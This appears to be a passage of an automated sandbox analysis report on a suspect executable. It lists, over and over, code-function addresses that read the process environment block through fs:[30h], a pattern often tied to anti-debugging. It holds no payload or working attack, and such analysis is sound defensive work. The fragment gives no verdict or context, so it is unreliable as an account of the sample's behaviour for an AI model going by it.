          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]4_2_01869100
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov eax, dword ptr fs:[00000030h]4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01884120 mov ecx, dword ptr fs:[00000030h]4_2_01884120
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189513A mov eax, dword ptr fs:[00000030h]4_2_0189513A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189513A mov eax, dword ptr fs:[00000030h]4_2_0189513A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188B944 mov eax, dword ptr fs:[00000030h]4_2_0188B944
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188B944 mov eax, dword ptr fs:[00000030h]4_2_0188B944
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186C962 mov eax, dword ptr fs:[00000030h]4_2_0186C962
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B171 mov eax, dword ptr fs:[00000030h]4_2_0186B171
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B171 mov eax, dword ptr fs:[00000030h]4_2_0186B171
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869080 mov eax, dword ptr fs:[00000030h]4_2_01869080
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3884 mov eax, dword ptr fs:[00000030h]4_2_018E3884
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3884 mov eax, dword ptr fs:[00000030h]4_2_018E3884
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A90AF mov eax, dword ptr fs:[00000030h]4_2_018A90AF
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018920A0 mov eax, dword ptr fs:[00000030h]4_2_018920A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov ecx, dword ptr fs:[00000030h]4_2_0189F0BF
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov eax, dword ptr fs:[00000030h]4_2_0189F0BF
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189F0BF mov eax, dword ptr fs:[00000030h]4_2_0189F0BF
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov ecx, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FB8D0 mov eax, dword ptr fs:[00000030h]4_2_018FB8D0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]4_2_018640E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]4_2_018640E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018640E1 mov eax, dword ptr fs:[00000030h]4_2_018640E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018658EC mov eax, dword ptr fs:[00000030h]4_2_018658EC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01934015 mov eax, dword ptr fs:[00000030h]4_2_01934015
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01934015 mov eax, dword ptr fs:[00000030h]4_2_01934015
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]4_2_018E7016
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]4_2_018E7016
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7016 mov eax, dword ptr fs:[00000030h]4_2_018E7016
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]4_2_0189002D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]4_2_0189002D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]4_2_0189002D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]4_2_0189002D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189002D mov eax, dword ptr fs:[00000030h]4_2_0189002D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]4_2_0187B02A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]4_2_0187B02A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]4_2_0187B02A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187B02A mov eax, dword ptr fs:[00000030h]4_2_0187B02A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01880050 mov eax, dword ptr fs:[00000030h]4_2_01880050
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01880050 mov eax, dword ptr fs:[00000030h]4_2_01880050
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01922073 mov eax, dword ptr fs:[00000030h]4_2_01922073
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01931074 mov eax, dword ptr fs:[00000030h]4_2_01931074
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01871B8F mov eax, dword ptr fs:[00000030h]4_2_01871B8F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01871B8F mov eax, dword ptr fs:[00000030h]4_2_01871B8F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191D380 mov ecx, dword ptr fs:[00000030h]4_2_0191D380
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192138A mov eax, dword ptr fs:[00000030h]4_2_0192138A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189B390 mov eax, dword ptr fs:[00000030h]4_2_0189B390
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892397 mov eax, dword ptr fs:[00000030h]4_2_01892397
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]4_2_01894BAD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]4_2_01894BAD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894BAD mov eax, dword ptr fs:[00000030h]4_2_01894BAD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01935BA5 mov eax, dword ptr fs:[00000030h]4_2_01935BA5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E53CA mov eax, dword ptr fs:[00000030h]4_2_018E53CA
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E53CA mov eax, dword ptr fs:[00000030h]4_2_018E53CA
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188DBE9 mov eax, dword ptr fs:[00000030h]4_2_0188DBE9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018903E2 mov eax, dword ptr fs:[00000030h]4_2_018903E2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192131B mov eax, dword ptr fs:[00000030h]4_2_0192131B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186DB40 mov eax, dword ptr fs:[00000030h]4_2_0186DB40
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938B58 mov eax, dword ptr fs:[00000030h]4_2_01938B58
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186F358 mov eax, dword ptr fs:[00000030h]4_2_0186F358
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186DB60 mov ecx, dword ptr fs:[00000030h]4_2_0186DB60
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01893B7A mov eax, dword ptr fs:[00000030h]4_2_01893B7A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01893B7A mov eax, dword ptr fs:[00000030h]4_2_01893B7A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189D294 mov eax, dword ptr fs:[00000030h]4_2_0189D294
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189D294 mov eax, dword ptr fs:[00000030h]4_2_0189D294
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]4_2_018652A5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]4_2_018652A5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]4_2_018652A5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]4_2_018652A5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018652A5 mov eax, dword ptr fs:[00000030h]4_2_018652A5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187AAB0 mov eax, dword ptr fs:[00000030h]4_2_0187AAB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187AAB0 mov eax, dword ptr fs:[00000030h]4_2_0187AAB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FAB0 mov eax, dword ptr fs:[00000030h]4_2_0189FAB0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892ACB mov eax, dword ptr fs:[00000030h]4_2_01892ACB
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892AE4 mov eax, dword ptr fs:[00000030h]4_2_01892AE4
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AA16 mov eax, dword ptr fs:[00000030h]4_2_0192AA16
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192AA16 mov eax, dword ptr fs:[00000030h]4_2_0192AA16
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01878A0A mov eax, dword ptr fs:[00000030h]4_2_01878A0A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]4_2_0186AA16
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01883A1C mov eax, dword ptr fs:[00000030h]4_2_01883A1C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]4_2_01865210
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov ecx, dword ptr fs:[00000030h]4_2_01865210
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]4_2_01865210
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01865210 mov eax, dword ptr fs:[00000030h]4_2_01865210
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A4A2C mov eax, dword ptr fs:[00000030h]4_2_018A4A2C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A4A2C mov eax, dword ptr fs:[00000030h]4_2_018A4A2C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]4_2_01869240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]4_2_01869240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]4_2_01869240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869240 mov eax, dword ptr fs:[00000030h]4_2_01869240
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192EA55 mov eax, dword ptr fs:[00000030h]4_2_0192EA55
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018F4257 mov eax, dword ptr fs:[00000030h]4_2_018F4257
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A927A mov eax, dword ptr fs:[00000030h]4_2_018A927A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191B260 mov eax, dword ptr fs:[00000030h]4_2_0191B260
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0191B260 mov eax, dword ptr fs:[00000030h]4_2_0191B260
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938A62 mov eax, dword ptr fs:[00000030h]4_2_01938A62
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]4_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]4_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]4_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892581 mov eax, dword ptr fs:[00000030h]4_2_01892581
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]4_2_01862D8A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]4_2_01862D8A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]4_2_01862D8A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]4_2_01862D8A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01862D8A mov eax, dword ptr fs:[00000030h]4_2_01862D8A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FD9B mov eax, dword ptr fs:[00000030h]4_2_0189FD9B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189FD9B mov eax, dword ptr fs:[00000030h]4_2_0189FD9B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018935A1 mov eax, dword ptr fs:[00000030h]4_2_018935A1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]4_2_01891DB5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]4_2_01891DB5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01891DB5 mov eax, dword ptr fs:[00000030h]4_2_01891DB5
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019305AC mov eax, dword ptr fs:[00000030h]4_2_019305AC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019305AC mov eax, dword ptr fs:[00000030h]4_2_019305AC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov ecx, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6DC9 mov eax, dword ptr fs:[00000030h]4_2_018E6DC9
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01918DF1 mov eax, dword ptr fs:[00000030h]4_2_01918DF1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E0 mov eax, dword ptr fs:[00000030h]4_2_0187D5E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187D5E0 mov eax, dword ptr fs:[00000030h]4_2_0187D5E0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]4_2_0192FDE2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]4_2_0192FDE2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]4_2_0192FDE2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192FDE2 mov eax, dword ptr fs:[00000030h]4_2_0192FDE2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938D34 mov eax, dword ptr fs:[00000030h]4_2_01938D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0192E539 mov eax, dword ptr fs:[00000030h]4_2_0192E539
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]4_2_01894D3B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]4_2_01894D3B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01894D3B mov eax, dword ptr fs:[00000030h]4_2_01894D3B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01873D34 mov eax, dword ptr fs:[00000030h]4_2_01873D34
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186AD30 mov eax, dword ptr fs:[00000030h]4_2_0186AD30
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018EA537 mov eax, dword ptr fs:[00000030h]4_2_018EA537
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018A3D43 mov eax, dword ptr fs:[00000030h]4_2_018A3D43
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E3540 mov eax, dword ptr fs:[00000030h]4_2_018E3540
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01913D40 mov eax, dword ptr fs:[00000030h]4_2_01913D40
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01887D50 mov eax, dword ptr fs:[00000030h]4_2_01887D50
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C577 mov eax, dword ptr fs:[00000030h]4_2_0188C577
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C577 mov eax, dword ptr fs:[00000030h]4_2_0188C577
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0187849B mov eax, dword ptr fs:[00000030h]4_2_0187849B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01938CD6 mov eax, dword ptr fs:[00000030h]4_2_01938CD6
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019214FB mov eax, dword ptr fs:[00000030h]4_2_019214FB
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]4_2_018E6CF0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]4_2_018E6CF0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6CF0 mov eax, dword ptr fs:[00000030h]4_2_018E6CF0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]4_2_018E6C0A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]4_2_018E6C0A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]4_2_018E6C0A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E6C0A mov eax, dword ptr fs:[00000030h]4_2_018E6C0A
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01921C06 mov eax, dword ptr fs:[00000030h]4_2_01921C06
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]4_2_0193740D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]4_2_0193740D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0193740D mov eax, dword ptr fs:[00000030h]4_2_0193740D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189BC2C mov eax, dword ptr fs:[00000030h]4_2_0189BC2C
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A44B mov eax, dword ptr fs:[00000030h]4_2_0189A44B
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FC450 mov eax, dword ptr fs:[00000030h]4_2_018FC450
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018FC450 mov eax, dword ptr fs:[00000030h]4_2_018FC450
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188746D mov eax, dword ptr fs:[00000030h]4_2_0188746D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01878794 mov eax, dword ptr fs:[00000030h]4_2_01878794
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]4_2_018E7794
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]4_2_018E7794
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E7794 mov eax, dword ptr fs:[00000030h]4_2_018E7794
